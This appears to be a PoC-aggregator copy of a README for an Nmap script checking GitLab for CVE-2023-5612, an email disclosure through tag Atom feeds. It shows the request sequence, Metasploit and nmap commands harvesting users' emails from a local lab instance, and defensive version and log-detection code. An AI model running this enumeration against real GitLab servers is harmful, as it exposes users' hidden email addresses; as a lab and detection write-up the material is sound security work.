Related vulnerability
Title:
GitLab security vulnerability
(CVE-2023-5612)
Description: GitLab is an open-source end-to-end software development platform from the US company GitLab, with built-in version control, issue tracking, code review, CI/CD (continuous integration and continuous delivery) and other features. GitLab versions before 16.6.6, 16.7 versions before 16.7.4 and 16.8 versions before 16.8.1 contain a security vulnerability. An attacker can exploit it to read user email addresses via the tags feed.
Description
Nmap NSE to check for CVE-2023-5612
Introduction
# Disclosure of the public email in Tags RSS Feed
https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/
```
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled. This is a medium severity issue (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N, 5.3). It is now mitigated in the latest release and is assigned CVE-2023-5612.
```
https://nvd.nist.gov/vuln/detail/CVE-2023-5612
```
An issue has been discovered in GitLab affecting all versions before 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1. It was possible to read the user email address via tags feed although the visibility in the user profile has been disabled.
```
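The two advisory excerpts above give the exact affected ranges. The following is an added example, not code from the NSE script or from GitLab, that turns those ranges into a check a defender can run against the version string of their own instance (for example the one shown on the instance's Help page). The `FIXED` table and the assumption that later minor lines (16.9 and up) carry the fix are derived from the advisory text only.

```python
"""Added example: decide whether a GitLab version string falls inside the
ranges affected by CVE-2023-5612 as stated in the advisory:
all versions before 16.6.6, 16.7 before 16.7.4, 16.8 before 16.8.1.
Not part of the NSE script or of GitLab's own code."""

import re
from typing import Tuple

# First patched release per minor line that got a backport (from the advisory).
FIXED = {
    (16, 7): (16, 7, 4),
    (16, 8): (16, 8, 1),
}
# Everything older than this, in any earlier minor line, is affected.
FIRST_FIXED_BEFORE_16_7 = (16, 6, 6)


def parse_version(text: str) -> Tuple[int, int, int]:
    """Extract major.minor.patch from strings such as '16.5.10',
    'v16.8.1-ee' or the image tag '16.5.10-ce.0'.
    Raises ValueError when no dotted version is present."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """True when the given GitLab version is inside an affected range."""
    v = parse_version(version)
    line = v[:2]
    if line in FIXED:
        # 16.7.x and 16.8.x: affected only below their backported fix.
        return v < FIXED[line]
    if line > (16, 8):
        # Assumption derived from the advisory: minor lines released
        # after 16.8.1 (16.9 and later) already contain the fix.
        return False
    # 16.6.x and every earlier release line: affected below 16.6.6.
    return v < FIRST_FIXED_BEFORE_16_7


if __name__ == "__main__":
    for sample in ["16.5.10-ce.0", "16.6.6", "16.7.3", "16.8.0", "16.8.1", "17.0.0"]:
        print(f"{sample:14} affected={is_affected(sample)}")
```

The test image used later on this page, `gitlab/gitlab-ce:16.5.10-ce.0`, is reported as affected, which is consistent with the successful run shown below it.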
## Description
A vulnerability was found in GitLab that allows obtaining the list of user emails (and names), even when some of those users have a hidden profile. It is possible because the `/api/v4/projects` endpoint can be reached without authentication. For each project one can take its `web_url` and send a request to the `/-/tags?format=atom` endpoint, receiving XML in which, among other things, the user's name and email are visible:
```xml
...
<name>test</name>
<email>test@test.com</email>
...
```
## NSE Dev
PoC:
- https://hackerone.com/reports/2208790
- https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure.rb
- https://sploitus.com/?query=CVE-2023-5612#exploits
**Note**: there is an [nse-script](https://github.com/TopskiyPavelQwertyGang/Review.CVE-2023-5612) supposedly for this vulnerability, but if you look at its name and contents it becomes clear that this is a mistake and it does not relate to this CVE.
#### Algorithm:
1. Get the names of all available projects:
```http
GET /api/v4/projects?output_mode=json HTTP/1.1
```
Example response:
```json
[{"id":3,"description":null,"name":"project3","name_with_namespace":"test / project3","path":"project3","path_with_namespace":"test/project3","created_at":"2025-09-13T16:39:05.885Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/test/project3.git","http_url_to_repo":"http://localhost:8929/test/project3.git","web_url":"http://localhost:8929/test/project3","readme_url":"http://localhost:8929/test/project3/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:39:05.885Z","namespace":{"id":4,"name":"test","path":"test","kind":"user","full_path":"test","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80\u0026d=identicon","web_url":"http://localhost:8929/test"}},{"id":2,"description":null,"name":"project2","name_with_namespace":"testgroup / project2","path":"project2","path_with_namespace":"testgroup/project2","created_at":"2025-09-13T16:35:26.979Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/testgroup/project2.git","http_url_to_repo":"http://localhost:8929/testgroup/project2.git","web_url":"http://localhost:8929/testgroup/project2","readme_url":"http://localhost:8929/testgroup/project2/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:35:26.979Z","namespace":{"id":3,"name":"testgroup","path":"testgroup","kind":"group","full_path":"testgroup","parent_id":null,"avatar_url":null,"web_url":"http://localhost:8929/groups/testgroup"}},{"id":1,"description":null,"name":"test","name_with_namespace":"Administrator / test","path":"test","path_with_namespace":"root/test","created_at":"2025-09-12T15:03:47.319Z","default_branch":"main","tag_list":[],"topics":[],"ssh_url_to_repo":"ssh://git@localhost:2424/root/test.git","http_url_to_repo":"http://localhost:8929/root/test.git","web_url":"http://localhost:8929/root/test","readme_url":"http://localhost:8929/root/test/-/blob/main/README.md","forks_count":0,"avatar_url":null,"star_count":0,"last_activity_at":"2025-09-13T16:19:10.901Z","namespace":{"id":1,"name":"Administrator","path":"root","kind":"user","full_path":"root","parent_id":null,"avatar_url":"https://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80\u0026d=identicon","web_url":"http://localhost:8929/root"}}]
```
2. For each project, fetch its tags in Atom XML format:
```http
GET /test/project3/-/tags?format=atom HTTP/1.1
GET /root/test/-/tags?format=atom HTTP/1.1
```
Example response:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
<title>project3 tags</title>
<link href="http://127.0.0.1:8929/test/project3/-/tags?format=atom" rel="self" type="application/atom+xml"/>
<link href="http://127.0.0.1:8929/test/project3/-/tags" rel="alternate" type="text/html"/>
<id>http://127.0.0.1:8929/test/project3/-/tags</id>
<entry>
<id>http://127.0.0.1:8929/test/project3/-/tags/1.0.0</id>
<link href="http://127.0.0.1:8929/test/project3/-/tags/1.0.0"/>
<title>1.0.0</title>
<summary></summary>
<content type="html"></content>
<media:thumbnail width="40" height="40" url="https://www.gravatar.com/avatar/b642b4217b34b1e8d3bd915fc65c4452?s=80&d=identicon"/>
<author>
<name>test</name>
<email>test@test.com</email>
</author>
</entry>
</feed>
```
In this document we see the `name` and `email` fields of every tag author in the project. Their disclosure to an unauthenticated requester is the essence of the vulnerability.
Example of successful exploitation:
```bash
# Metasploit
use auxiliary/gather/gitlab_tags_rss_feed_email_disclosure
set RHOSTS 127.0.0.1
set RPORT 8929
run
```
Result:
```bash
auxiliary(gather/gitlab_tags_rss_feed_email_disclosure) > run
[*] Running module against 127.0.0.1
[+] Scraping ALL projects...
[+] name: test
[+] e-mail: test@test.com
[+] name: Administrator
[+] e-mail: admin@example.com
[*] Auxiliary module execution completed
```
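The sequence above (one unauthenticated listing of `/api/v4/projects`, then one `/-/tags?format=atom` fetch per project) leaves a recognisable footprint in the web server access log. The following is an added example, not part of the NSE script, the Metasploit module or GitLab itself, that scans combined-format access log lines (the format written by the Omnibus-bundled nginx to `gitlab_access.log`) and reports clients that performed the project listing and then pulled the tag feed of several projects within a short window. The log lines are constructed for the example; the window and threshold are assumptions to tune per deployment.

```python
"""Added example (not from the NSE script, Metasploit or GitLab): flag
clients whose access-log footprint matches the CVE-2023-5612 enumeration
sequence, a listing of /api/v4/projects followed by tag-feed fetches
(/-/tags?format=atom) across several projects from the same client."""

import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sample lines in combined log format; not captured from a real host.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Sep/2025:16:39:01 +0300] "GET /api/v4/projects HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2025:16:39:02 +0300] "GET /test/project3/-/tags?format=atom HTTP/1.1" 200 911 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2025:16:39:02 +0300] "GET /testgroup/project2/-/tags?format=atom HTTP/1.1" 200 904 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Sep/2025:16:39:03 +0300] "GET /root/test/-/tags?format=atom HTTP/1.1" 200 898 "-" "Mozilla/5.0"
198.51.100.9 - - [14/Sep/2025:16:40:10 +0300] "GET /root/test/-/tags?format=atom HTTP/1.1" 200 898 "-" "feedreader/1.0"
198.51.100.9 - - [14/Sep/2025:16:41:10 +0300] "GET /root/test/-/tags HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
"""

# client, timestamp, request line and status of a combined-format line
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; None for lines that do not fit the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "path": m["path"],
        "status": int(m["status"]),
    }


def project_of_tags_feed(path: str) -> Optional[str]:
    """Return the project path when the request is a tags Atom feed, else None.
    Only the Atom variant is of interest; the HTML tags page is normal browsing."""
    base, _, query = path.partition("?")
    if base.endswith("/-/tags") and "format=atom" in query.split("&"):
        return base[: -len("/-/tags")]
    return None


def find_enumerators(log_text: str,
                     window: timedelta = timedelta(minutes=5),
                     min_projects: int = 2) -> Dict[str, List[str]]:
    """Map client IP -> sorted project paths for clients that listed
    /api/v4/projects and then fetched at least `min_projects` distinct tag
    feeds within `window` after a listing. Only 200 responses count."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev and ev["status"] == 200:
            by_ip[ev["ip"]].append(ev)

    hits: Dict[str, List[str]] = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        # paginated listings (?per_page=..&page=..) have the same base path
        listings = [e["ts"] for e in events
                    if e["path"].partition("?")[0] == "/api/v4/projects"]
        if not listings:
            continue
        projects = set()
        for e in events:
            proj = project_of_tags_feed(e["path"])
            if proj and any(t <= e["ts"] <= t + window for t in listings):
                projects.add(proj)
        if len(projects) >= min_projects:
            hits[ip] = sorted(projects)
    return hits


if __name__ == "__main__":
    for ip, projects in find_enumerators(SAMPLE_LOG).items():
        print(f"{ip}: tag feeds of {len(projects)} projects after project listing: {projects}")
```

The access log does not record whether a request was authenticated, so a hit is a triage signal rather than proof of abuse: a legitimate user can produce the same pattern. Correlate the flagged client with the application logs that record the authenticated user, and treat hits on an instance in the affected range (before 16.6.6, 16.7 before 16.7.4, 16.8 before 16.8.1) as a reason to upgrade first and investigate second.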
## NSE Test
Testing was carried out against `GitLab CE 16.5.10`
#### `docker-compose.yml`
```yaml
services:
  gitlab:
    image: gitlab/gitlab-ce:16.5.10-ce.0
    container_name: gitlab-ce
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://localhost:8929'
        gitlab_rails['gitlab_shell_ssh_port'] = 2424
    ports:
      - '8929:8929'
      - '443:443'
      - '2424:22'
    volumes:
      - '$GITLAB_HOME/config:/etc/gitlab'
      - '$GITLAB_HOME/logs:/var/log/gitlab'
      - '$GITLAB_HOME/data:/var/opt/gitlab'
    shm_size: '256m'
```
#### Launch && prepare test env
1. Bring up the vulnerable `gitlab-ce` in docker:
```bash
sudo docker compose up
sudo docker exec -it {CONTAINER_ID} grep 'Password:' /etc/gitlab/initial_root_password
# Do not decode the shown base64-looking value, just use it as is
# Change root's creds to something like root:toortoor
```
2. Prepare it:
- log in as root
- create a project
- create a tag for the project as `root`
- create a user `test`, log in as `test`
- create a project as `test`
- create a tag for that project as `test`
3. Run the script:
```bash
# full scan
nmap --script cve-2023-5612 <TARGET> -p <PORT>
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=full
# fast scan
nmap --script cve-2023-5612 <TARGET> -p <PORT> --script-args check_mode=fast
```
Example of successful exploitation:
```bash
nmap -Pn --script cve-2023-5612 localhost -p 8929 --script-args check_mode=full
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:39 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[+] Projects found:
http://localhost:8929/test/project3
http://localhost:8929/testgroup/project2
http://localhost:8929/root/test
[+] Results:
email,username,project_url
test@test.com,test,http://localhost:8929/test/project3
admin@example.com,Administrator,http://localhost:8929/testgroup/project2
admin@example.com,Administrator,http://localhost:8929/root/test
[+] Writing results to ./gitlab_enumerated.csv...
[+] Done
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
8929/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1.64 seconds
# view saved results, show only emails
tail -n +2 gitlab_enumerated.csv | cut -d "," -f 1| sort -u
admin@example.com
test@test.com
```
Example of an unsuccessful run against a target that is not GitLab:
```bash
nmap --script cve-2023-5612 localhost -p 1337
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 06:35 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[-] Error: The target is not a GitLab instance. Exiting...
#############################
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00012s latency).
Other addresses for localhost (not scanned): ::1
PORT STATE SERVICE
1337/tcp open waste
Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds
```
Example of a run against a real NON-vulnerable target:
```bash
nmap -Pn -p 7180 --script cve-2023-5612 <IP-addr> --script-args check_mode=fast
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-14 16:37 MSK
####### CVE-2023-5612 #######
[+] Checking target...
[+] Checking for vulnerability...
[-] Projects list seems to be empty or unavailable
[-] Target is NOT vulnerable
#############################
```
## Links
- https://vuldb.com/?id.252096
- https://hackerone.com/reports/2208790
- https://www.rapid7.com/db/modules/auxiliary/gather/gitlab_tags_rss_feed_email_disclosure/
- https://scm.cms.hu-berlin.de/safeguarding/cvelistV5/-/blob/cve_2025-05-08_0800Z/cves/2023/5xxx/CVE-2023-5612.json
- https://docs.gitlab.com/install/docker/installation/
- https://hub.docker.com/r/gitlab/gitlab-ce/tags/?page=4
- https://hub.docker.com/layers/gitlab/gitlab-ce/16.5.10-ce.0/images/sha256-a8a3b7904bb5f92b7fd55e924d65c08aac1999ba5a2670f17c00472918ae6f42
- https://cve.akaoma.com/cve-2023-5612
File snapshot
[4.0K] /data/pocs/29db85d6c703938e34a50e5807aac4a4a6023549
├── [7.8K] cve-2023-5612.nse
├── [ 523] docker-compose.yml
└── [ 11K] README.md
0 directories, 3 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has gone offline or is unreachable, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.